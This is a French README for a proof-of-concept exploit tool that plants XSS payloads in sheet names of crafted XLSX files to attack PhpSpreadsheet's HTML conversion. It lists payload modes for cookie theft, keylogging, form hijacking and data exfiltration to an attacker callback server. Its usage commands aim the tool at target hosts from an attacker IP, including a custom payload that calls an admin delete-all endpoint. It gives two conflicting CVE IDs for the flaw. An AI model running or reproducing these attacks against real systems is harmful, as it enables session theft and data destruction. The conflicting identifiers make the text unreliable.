
Ceci est un PoC/Exploit pour la CVE-2024-47875 vulnérabilité XSS de PhpSpreadsheet.
Ceci est un PoC sur la CVE-2025-22131, une vulnérabilité de type Cross-Site Scripting (XSS) dans les versions de PhpSpreadsheet antérieures à 2.2.2, 2.1.2 et 1.29.4. La vulnérabilité réside dans la fonction generateNavigation(), qui ne nettoie pas les noms de feuilles lors de la conversion XLSX vers HTML, permettant l'injection de JavaScript malveillant.
CVE ID: CVE-2024-47875
Avis GitHub : GHSA-79xx-vf93-p7cx
Versions concernées : PhpSpreadsheet < 2.2.2, < 2.1.2, < 1.29.4
Auteur : Roj
Licence : MIT
Dépôt : Dépôt PoC
📄 Génère des fichiers XLSX malveillants avec des charges utiles XSS personnalisables
🛠️ Prend en charge plusieurs types de charges utiles :
cookie_theft : Vole les cookies de session
redirect : Redirige l'utilisateur vers un site contrôlé par l'attaquant
alert : Affiche une alerte de test pour le PoC
keylogger : Capture les frappes clavier
form_hijack : Intercepte les soumissions de formulaire
data_exfil : Exfiltre les données depuis un point d'accès spécifié
🌐 Serveur HTTP intégré pour capturer les rappels d'exploitation
⬆️ Télécharge les fichiers XLSX malveillants vers un point d'accès cible
💾 Enregistre les données capturées (ex. cookies) dans un fichier JSON
🎨 Sortie terminal colorisée pour une meilleure lisibilité
🔍 Journalisation détaillée pour le débogage
python exploit.py -h
🚀 Exemples d'utilisation :
#Basic cookie theft attack
python3 exploit.py http://target.htb 10.10.16.50
# Custom upload endpoint
python3 exploit.py http://app.htb 10.10.16.50 -e /api/file-upload
# Different payload types
python3 exploit.py http://target.com 10.10.16.50 -p keylogger
python3 exploit.py http://target.com 10.10.16.50 -p redirect
python3 exploit.py http://target.com 10.10.16.50 -p form_hijack
# Custom XSS payload
python3 exploit.py http://target.com 10.10.16.50 --custom "<script>fetch('/admin/delete-all')</script>"
Je souhaite recevoir des retours , bonne chance à tous.